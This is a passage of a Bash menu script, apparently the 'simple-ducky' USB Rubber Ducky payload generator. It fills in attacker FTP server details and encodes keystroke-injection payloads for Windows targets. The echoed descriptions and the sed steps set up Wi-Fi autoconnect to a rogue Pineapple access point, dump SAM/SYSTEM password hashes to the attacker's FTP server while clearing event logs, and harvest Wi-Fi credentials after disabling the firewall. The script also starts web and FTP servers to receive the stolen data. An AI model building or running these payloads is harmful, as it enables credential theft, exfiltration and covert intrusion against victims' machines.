	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
    function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	xdg-open /usr/share/simple-ducky/ &
	clear
	read -p "Would you like to return to the main menu [y/n]? " option
	clear

	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
# WiFi Autoconnect w/o UAC (Designed for the WiFi Pineapple | Win Vista/7)
#################################################################################
f_wifiautoconnectVIS7nouac(){
	clear
	echo -e "\e[1;31mDescription:\e[0m Downloads an xml file from pastebin (using Mubix’ powershell code) and the adds it to the wireless profiles using netsh."
	echo -e "\e[1;31mNote:\e[0m The autoconnect acess point will be set to - Pineapple"
	echo -e "\e[1;31mOptions:\e[0m You might want to change the name of the access point, but you’ll need to upload your own xml. Just modify the 'wifi_autoconnect.con' file in the /usr/share/simple-ducky/payloads/ directory"
	echo -e "\e[1;31mTarget:\e[0m Windows Vista/7 w/o UAC Enabled"
	echo -e "\e[1;31mAuthor:\e[0m Xcellerator"
	echo -e ""
	echo ""
	echo -e "How long of a delay would like before starting? "
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	echo ""
	clear
	cp /usr/share/simple-ducky/payloads/wifiautoconnectVIS7nouac.conf /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
  	function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	xdg-open /usr/share/simple-ducky/ &
	clear
	read -p "Would you like to return to the main menu [y/n]? " option
	clear

	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
# WiFi Autoconnect w/UAC (Designed for the WiFi Pineapple | Win 8)
#################################################################################
f_wifiautoconnectWIN8uac(){
	clear
	echo -e "\e[1;31mDescription:\e[0m Downloads an xml file from pastebin (using Mubix’ powershell code) and the adds it to the wireless profiles using netsh."
	echo -e "\e[1;31mNote:\e[0m The autoconnect acess point will be set to - Pineapple"
	echo -e "\e[1;31mOptions:\e[0m You might want to change the name of the access point, but you’ll need to upload your own xml. Just modify the 'wifi_autoconnect.con' file in the /usr/share/simple-ducky/payloads/ directory"
	echo -e "\e[1;31mTarget:\e[0m Windows 8 w/UAC Enabled"
	echo -e "\e[1;31mAuthor:\e[0m Xcellerator"
	echo ""
	echo ""
	echo -e "How long of a delay would like before starting? "
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	echo ""
	clear
	cp /usr/share/simple-ducky/payloads/wifiautoconnectWIN8uac.conf /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
  	function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	xdg-open /usr/share/simple-ducky/ &
	clear
	read -p "Would you like to return to the main menu [y/n]? " option
	clear

	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
# WiFi Autoconnect w/o UAC (Designed for the WiFi Pineapple | Win 8)
#################################################################################
f_wifiautoconnectWIN8nouac(){
	clear
	echo -e "\e[1;31mDescription:\e[0m Downloads an xml file from pastebin (using Mubix’ powershell code) and the adds it to the wireless profiles using netsh."
	echo -e "\e[1;31mNote:\e[0m The autoconnect acess point will be set to - Pineapple"
	echo -e "\e[1;31mOptions:\e[0m You might want to change the name of the access point, but you’ll need to upload your own xml. Just modify the 'wifi_autoconnect.con' file in the /usr/share/simple-ducky/payloads/ directory"
	echo -e "\e[1;31mTarget:\e[0m Windows 8 w/o UAC Enabled"
	echo -e "\e[1;31mAuthor:\e[0m Xcellerator"
	echo ""
	echo ""
	echo -e "How long of a delay would like before starting? "
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	echo ""
	clear
	cp /usr/share/simple-ducky/payloads/wifiautoconnectWIN8nouac.conf /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
		function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	xdg-open /usr/share/simple-ducky/ &
	clear
	read -p "Would you like to return to the main menu [y/n]? " option
	clear

	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
#################################################################################
#
# Password Attacks
#
#################################################################################
#################################################################################

#################################################################################
# LM/NTLM Hash Dump From Live System w/UAC (Win Vista/7/Server 2008)
#################################################################################
f_livehashVIS7uac(){
	clear
	echo -e "\e[1;31mDescription:\e[0m This payload uses VSSOwn.vbs (slightly modified) along with Pure-FTPD and 7zip to extract the SAM & SYSTEM file from the victims machine. This payload also clears all the logs from the machine, erasing any history of you being there."
	echo -e "\e[1;31mVSSOwn.vbs link:\e[0m http://ptscripts.googlecode.com/svn/trunk/windows/vssown.vbs"
	echo -e "\e[1;31m7zip Command Line link:\e[0m http://downloads.sourceforge.net/sevenzip/7za920.zip"
	echo -e "\e[1;31mNote 1:\e[0m I will place 7zip, vssown.vbs, logs.bat in the /var/www/ directory for you. The links above are just for reference."
	echo -e "\e[1;31mNote 2:\e[0m You might get an error stating that ntds.dit doesnt exist. This is because it is only located on Windows servers, so don't worry about it."
	echo -e "\e[1;31mTarget:\e[0m Windows Vista/7/Server 2008 w/UAC Enabled"
	echo -e "\e[1;31mAuthor:\e[0m skysploit"
	echo ""
	echo ""
	read -p "What is the IP/Domain of your ftp server? " attackerftp
	echo ""
	read -p "What is the username for your ftp server? " attackerusername
	echo ""
	read -p "What is the password for your ftp server? " attackerpassword
	echo ""
	echo ""echo -e "What is the IP/Domain address for your webserver? "
	read -p "[Example: www.example.com | www.example.com:port | $attackerftp] " webserverip
	echo ""
	read -p "Please set a password to be for your encrypted zip files. " zippassword
	echo ""
	echo -e "How long of a delay would like before starting? "
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	echo ""
	clear
	sed "/STRING/s/attackerftp/$attackerftp/g" /usr/share/simple-ducky/payloads/livehashVIS7uac.conf > /usr/share/simple-ducky/payload_del.txt
	sed "/STRING/s/attackerusername/$attackerusername/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload_del2.txt
	sed "/STRING/s/attackerpassword/$attackerpassword/g" /usr/share/simple-ducky/payload_del2.txt > /usr/share/simple-ducky/payload_del3.txt
	sed "/STRING/s/webserverip/$webserverip/g" /usr/share/simple-ducky/payload_del3.txt > /usr/share/simple-ducky/payload_del4.txt
	sed "/STRING/s/zippassword/$zippassword/g" /usr/share/simple-ducky/payload_del4.txt > /usr/share/simple-ducky/payload_del5.txt
	sed "/STRING/s/zippassword/$zippassword/g" /usr/share/simple-ducky/payload_del5.txt > /usr/share/simple-ducky/payload_del6.txt
	sed "/STRING/s/zippassword/$zippassword/g" /usr/share/simple-ducky/payload_del6.txt > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	rm /usr/share/simple-ducky/payload_del.txt
	rm /usr/share/simple-ducky/payload_del2.txt
	rm /usr/share/simple-ducky/payload_del3.txt
	rm /usr/share/simple-ducky/payload_del4.txt
	rm /usr/share/simple-ducky/payload_del5.txt
	rm /usr/share/simple-ducky/payload_del6.txt
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
	function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	echo -e "\e[1;34mMoving files over to your web directory and starting your web and ftp servers.\e[0m"
	sleep 4
	clear
	cp /usr/share/simple-ducky/misc/7za.exe /var/www/7za.exe
	clear
	service apache2 restart
	clear
	service pure-ftpd restart
	clear
	xdg-open /usr/share/simple-ducky/ &
	clear
	read -p "Would you like to return to the main menu [y/n]? " option
	clear

	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
# LM/NTLM Hash Dump From Live System w/o UAC (Win Vista/7/Server 2008)
#################################################################################
f_livehashVIS7nouac(){
	clear
	echo -e "\e[1;31mDescription:\e[0m This payload uses VSSOwn.vbs (slightly modified) along with Pure-FTPD and 7zip to extract the SAM & SYSTEM file from the victims machine. This payload also clears all the logs from the machine, erasing any history of you being there."
	echo -e "\e[1;31mVSSOwn.vbs link:\e[0m http://ptscripts.googlecode.com/svn/trunk/windows/vssown.vbs"
	echo -e "\e[1;31m7zip Command Line link:\e[0m http://downloads.sourceforge.net/sevenzip/7za920.zip"
	echo -e "\e[1;31mNote 1:\e[0m I will place 7zip, vssown.vbs, logs.bat in the /var/www/ directory for you. The links above are just for reference."
	echo -e "\e[1;31mNote 2:\e[0m You might get an error stating that ntds.dit doesnt exist. This is because it is only located on Windows servers, so don't worry about it."
	echo -e "\e[1;31mTarget:\e[0m Windows Vista/7/Server 2008 w/o UAC Enabled"
	echo -e "\e[1;31mAuthor:\e[0m skysploit"
	echo ""
	echo ""
	read -p "What is the IP/Domain of your ftp server? " attackerftp
	echo ""
	read -p "What is the username for your ftp server? " attackerusername
	echo ""
	read -p "What is the password for your ftp server? " attackerpassword
	echo ""
	echo ""echo -e "What is the IP/Domain address for your webserver? "
	read -p "[Example: www.example.com | www.example.com:port | $attackerftp] " webserverip
	echo ""
	read -p "Please set a password to be for your encrypted zip files. " zippassword
	echo ""
	echo -e "How long of a delay would like before starting? "
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	echo ""
	clear
	sed "/STRING/s/attackerftp/$attackerftp/g" /usr/share/simple-ducky/payloads/livehashVIS7nouac.conf > /usr/share/simple-ducky/payload_del.txt
	sed "/STRING/s/attackerusername/$attackerusername/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload_del2.txt
	sed "/STRING/s/attackerpassword/$attackerpassword/g" /usr/share/simple-ducky/payload_del2.txt > /usr/share/simple-ducky/payload_del3.txt
	sed "/STRING/s/webserverip/$webserverip/g" /usr/share/simple-ducky/payload_del3.txt > /usr/share/simple-ducky/payload_del4.txt
	sed "/STRING/s/zippassword/$zippassword/g" /usr/share/simple-ducky/payload_del4.txt > /usr/share/simple-ducky/payload_del5.txt
	sed "/STRING/s/zippassword/$zippassword/g" /usr/share/simple-ducky/payload_del5.txt > /usr/share/simple-ducky/payload_del6.txt
	sed "/STRING/s/zippassword/$zippassword/g" /usr/share/simple-ducky/payload_del6.txt > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	rm /usr/share/simple-ducky/payload_del.txt
	rm /usr/share/simple-ducky/payload_del2.txt
	rm /usr/share/simple-ducky/payload_del3.txt
	rm /usr/share/simple-ducky/payload_del4.txt
	rm /usr/share/simple-ducky/payload_del5.txt
	rm /usr/share/simple-ducky/payload_del6.txt
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
    function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	echo -e "\e[1;34mMoving files over to your web directory and starting your web and ftp servers.\e[0m"
	sleep 4
	clear
	cp /usr/share/simple-ducky/misc/7za.exe /var/www/7za.exe
	clear
	service apache2 restart
	clear
	service pure-ftpd restart
	clear
	xdg-open /usr/share/simple-ducky/ &
	clear
	read -p "Would you like to return to the main menu [y/n]? " option
	clear

	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
# LM/NTLM Hash Dump From Live System w/UAC (Windows 8)
#################################################################################
f_livehashWIN8uac(){
	clear
	echo -e "\e[1;31mDescription:\e[0m This payload uses VSSOwn.vbs (slightly modified) along with Pure-FTPD and 7zip to extract the SAM & SYSTEM file from the victims machine. This payload also clears all the logs from the machine, erasing any history of you being there."
	echo -e "\e[1;31mVSSOwn.vbs link:\e[0m http://ptscripts.googlecode.com/svn/trunk/windows/vssown.vbs"
	echo -e "\e[1;31m7zip Command Line link:\e[0m http://downloads.sourceforge.net/sevenzip/7za920.zip"
	echo -e "\e[1;31mNote 1:\e[0m I will place 7zip, vssown.vbs, logs.bat in the /var/www/ directory for you. The links above are just for reference."
	echo -e "\e[1;31mNote 2:\e[0m You might get an error stating that ntds.dit doesnt exist. This is because it is only located on Windows servers, so don't worry about it."
	echo -e "\e[1;31mTarget:\e[0m Windows 8 w/UAC Enabled"
	echo -e "\e[1;31mAuthor:\e[0m skysploit"
	echo ""
	echo ""
	read -p "What is the IP/Domain of your ftp server? " attackerftp
	echo ""
	read -p "What is the username for your ftp server? " attackerusername
	echo ""
	read -p "What is the password for your ftp server? " attackerpassword
	echo ""
	echo ""echo -e "What is the IP/Domain address for your webserver? "
	read -p "[Example: www.example.com | www.example.com:port | $attackerftp] " webserverip
	echo ""
	read -p "Please set a password to be for your encrypted zip files. " zippassword
	echo ""
	echo -e "How long of a delay would like before starting? "
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	echo ""
	clear
	sed "/STRING/s/attackerftp/$attackerftp/g" /usr/share/simple-ducky/payloads/livehashWIN8uac.conf > /usr/share/simple-ducky/payload_del.txt
	sed "/STRING/s/attackerusername/$attackerusername/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload_del2.txt
	sed "/STRING/s/attackerpassword/$attackerpassword/g" /usr/share/simple-ducky/payload_del2.txt > /usr/share/simple-ducky/payload_del3.txt
	sed "/STRING/s/webserverip/$webserverip/g" /usr/share/simple-ducky/payload_del3.txt > /usr/share/simple-ducky/payload_del4.txt
	sed "/STRING/s/zippassword/$zippassword/g" /usr/share/simple-ducky/payload_del4.txt > /usr/share/simple-ducky/payload_del5.txt
	sed "/STRING/s/zippassword/$zippassword/g" /usr/share/simple-ducky/payload_del5.txt > /usr/share/simple-ducky/payload_del6.txt
	sed "/STRING/s/zippassword/$zippassword/g" /usr/share/simple-ducky/payload_del6.txt > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	rm /usr/share/simple-ducky/payload_del.txt
	rm /usr/share/simple-ducky/payload_del2.txt
	rm /usr/share/simple-ducky/payload_del3.txt
	rm /usr/share/simple-ducky/payload_del4.txt
	rm /usr/share/simple-ducky/payload_del5.txt
	rm /usr/share/simple-ducky/payload_del6.txt
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
	  function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	echo -e "\e[1;34mMoving files over to your web directory and starting your web and ftp servers.\e[0m"
	sleep 4
	clear
	cp /usr/share/simple-ducky/misc/7za.exe /var/www/7za.exe
	clear
	service apache2 restart
	clear
	service pure-ftpd restart
	clear
	xdg-open /usr/share/simple-ducky/ &
	clear
	read -p "Would you like to return to the main menu [y/n]? " option
	clear

	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
# LM/NTLM Hash Dump From Live System w/o UAC (Windows 8)
#################################################################################
f_livehashWIN8nouac(){
	clear
	echo -e "\e[1;31mDescription:\e[0m This payload uses VSSOwn.vbs (slightly modified) along with Pure-FTPD and 7zip to extract the SAM & SYSTEM file from the victims machine. This payload also clears all the logs from the machine, erasing any history of you being there."
	echo -e "\e[1;31mVSSOwn.vbs link:\e[0m http://ptscripts.googlecode.com/svn/trunk/windows/vssown.vbs"
	echo -e "\e[1;31m7zip Command Line link:\e[0m http://downloads.sourceforge.net/sevenzip/7za920.zip"
	echo -e "\e[1;31mNote 1:\e[0m I will place 7zip, vssown.vbs, logs.bat in the /var/www/ directory for you. The links above are just for reference."
	echo -e "\e[1;31mNote 2:\e[0m You might get an error stating that ntds.dit doesnt exist. This is because it is only located on Windows servers, so don't worry about it."
	echo -e "\e[1;31mTarget:\e[0m Windows 8 w/o UAC Enabled"
	echo -e "\e[1;31mAuthor:\e[0m skysploit"
	echo ""
	echo ""
	read -p "What is the IP/Domain of your ftp server? " attackerftp
	echo ""
	read -p "What is the username for your ftp server? " attackerusername
	echo ""
	read -p "What is the password for your ftp server? " attackerpassword
	echo ""
	echo ""echo -e "What is the IP/Domain address for your webserver? "
	read -p "[Example: www.example.com | www.example.com:port | $attackerftp] " webserverip
	echo ""
	read -p "Please set a password to be for your encrypted zip files. " zippassword
	echo ""
	echo -e "How long of a delay would like before starting? "
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	echo ""
	clear
	sed "/STRING/s/attackerftp/$attackerftp/g" /usr/share/simple-ducky/payloads/livehashWIN8nouac.conf > /usr/share/simple-ducky/payload_del.txt
	sed "/STRING/s/attackerusername/$attackerusername/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload_del2.txt
	sed "/STRING/s/attackerpassword/$attackerpassword/g" /usr/share/simple-ducky/payload_del2.txt > /usr/share/simple-ducky/payload_del3.txt
	sed "/STRING/s/webserverip/$webserverip/g" /usr/share/simple-ducky/payload_del3.txt > /usr/share/simple-ducky/payload_del4.txt
	sed "/STRING/s/zippassword/$zippassword/g" /usr/share/simple-ducky/payload_del4.txt > /usr/share/simple-ducky/payload_del5.txt
	sed "/STRING/s/zippassword/$zippassword/g" /usr/share/simple-ducky/payload_del5.txt > /usr/share/simple-ducky/payload_del6.txt
	sed "/STRING/s/zippassword/$zippassword/g" /usr/share/simple-ducky/payload_del6.txt > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	rm /usr/share/simple-ducky/payload_del.txt
	rm /usr/share/simple-ducky/payload_del2.txt
	rm /usr/share/simple-ducky/payload_del3.txt
	rm /usr/share/simple-ducky/payload_del4.txt
	rm /usr/share/simple-ducky/payload_del5.txt
	rm /usr/share/simple-ducky/payload_del6.txt
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
	function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	echo -e "\e[1;34mMoving files over to your web directory and starting your web and ftp servers.\e[0m"
	sleep 4
	clear
	cp /usr/share/simple-ducky/misc/7za.exe /var/www/7za.exe
	clear
	service apache2 restart
	clear
	service pure-ftpd restart
	clear
	xdg-open /usr/share/simple-ducky/ &
	clear
	read -p "Would you like to return to the main menu [y/n]? " option
	clear

	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
# WiFi Acess Point Crediential Harvester w/UAC (Win Vista/7)
#################################################################################
f_wifunVIS7uac(){
	clear
	echo -e "\e[1;31mDescription:\e[0m This script will enter the command shell as an administrator, disable the firewall and export the wifi settings. The exported settings will be sent to an ftp server of your choice."
	echo -e "\e[1;31mTarget:\e[0m Windows Vista/7 w/UAC Enabled"
	echo -e "\e[1;31mAuthor:\e[0m Bucky67GTO"
	echo ""
	echo ""
	read -p "What is the IP/Domain of your ftp server? " attackerftp
	echo ""
	read -p "What is the username for your ftp server? " attackerusername
	echo ""
	read -p "What is the password for your ftp server? " attackerpassword
	echo ""
	echo -e "How long of a delay would like before starting? "
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	echo ""
	clear
	sed "/STRING/s/attackerftp/$attackerftp/g" /usr/share/simple-ducky/payloads/wifunVIS7uac.conf > /usr/share/simple-ducky/payload_del.txt
	sed "/STRING/s/attackerusername/$attackerusername/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload_del2.txt
	sed "/STRING/s/attackerpassword/$attackerpassword/g" /usr/share/simple-ducky/payload_del2.txt > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	rm /usr/share/simple-ducky/payload_del.txt
	rm /usr/share/simple-ducky/payload_del2.txt
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
    function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	xdg-open /usr/share/simple-ducky/ &
	clear
	service pure-ftpd restart
	clear
	read -p "Would you like to return to the main menu [y/n]? " option
	clear

	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
# WiFi Acess Point Crediential Harvester w/o UAC (Win Vista/7)
#################################################################################
f_wifunVIS7nouac(){
	clear
	echo -e "\e[1;31mDescription:\e[0m This script will enter the command shell as an administrator, disable the firewall and export the wifi settings. The exported settings will be sent to an ftp server of your choice."
	echo -e "\e[1;31mTarget:\e[0m Windows Vista/7 w/o UAC Enabled"
	echo -e "\e[1;31mAuthor:\e[0m Bucky67GTO"
	echo ""
	echo ""
	read -p "What is the IP/Domain of your ftp server? " attackerftp
	echo ""
	read -p "What is the username for your ftp server? " attackerusername
	echo ""
	read -p "What is the password for your ftp server? " attackerpassword
	echo ""
	echo -e "How long of a delay would like before starting? "
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	echo ""
	clear
	sed "/STRING/s/attackerftp/$attackerftp/g" /usr/share/simple-ducky/payloads/wifunVIS7nouac.conf > /usr/share/simple-ducky/payload_del.txt
	sed "/STRING/s/attackerusername/$attackerusername/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload_del2.txt
	sed "/STRING/s/attackerpassword/$attackerpassword/g" /usr/share/simple-ducky/payload_del2.txt > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	rm /usr/share/simple-ducky/payload_del.txt
	rm /usr/share/simple-ducky/payload_del2.txt
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
		function_lan
		read -p "Option: " keyboard
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt  -l $keyboard -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	else
		clear
		echo -e "\e[1;34mGenerating your inject.bin file...\e[0m"
		echo ""
		sleep 2
		java -jar encoder.jar -i payload.txt -o inject.bin
		echo ""
		echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m"
		echo ""
		read -p "Press any key to contiue" enter
	fi
	clear
	xdg-open /usr/share/simple-ducky/ &
	clear
	service pure-ftpd restart
	clear
	read -p "Would you like to return to the main menu [y/n]? " option
	clear

	case $option in
	y) simple-ducky ;;
	n) clear;exit ;;
	*) clear;exit ;;
	esac
}

#################################################################################
# WiFi Acess Point Crediential Harvester w/UAC (Win 8)
#################################################################################
f_wifunWIN8uac(){
	clear
	echo -e "\e[1;31mDescription:\e[0m This script will enter the command shell as an administrator, disable the firewall and export the wifi settings. The exported settings will be sent to an ftp server of your choice."
	echo -e "\e[1;31mTarget:\e[0m Windows 8 w/UAC Enabled"
	echo -e "\e[1;31mAuthor:\e[0m Bucky67GTO"
	echo ""
	echo ""
	read -p "What is the IP/Domain of your ftp server? " attackerftp
	echo ""
	read -p "What is the username for your ftp server? " attackerusername
	echo ""
	read -p "What is the password for your ftp server? " attackerpassword
	echo ""
	echo -e "How long of a delay would like before starting? "
	read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec
	echo ""
	clear
	sed "/STRING/s/attackerftp/$attackerftp/g" /usr/share/simple-ducky/payloads/wifunWIN8uac.conf > /usr/share/simple-ducky/payload_del.txt
	sed "/STRING/s/attackerusername/$attackerusername/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload_del2.txt
	sed "/STRING/s/attackerpassword/$attackerpassword/g" /usr/share/simple-ducky/payload_del2.txt > /usr/share/simple-ducky/payload.txt
	sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt
	rm /usr/share/simple-ducky/payload_del.txt
	rm /usr/share/simple-ducky/payload_del2.txt
	clear
	read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language
	if [ "$language" == "o" ]; then
  	function_lan
		read -p "Option: " keyboard
		clear
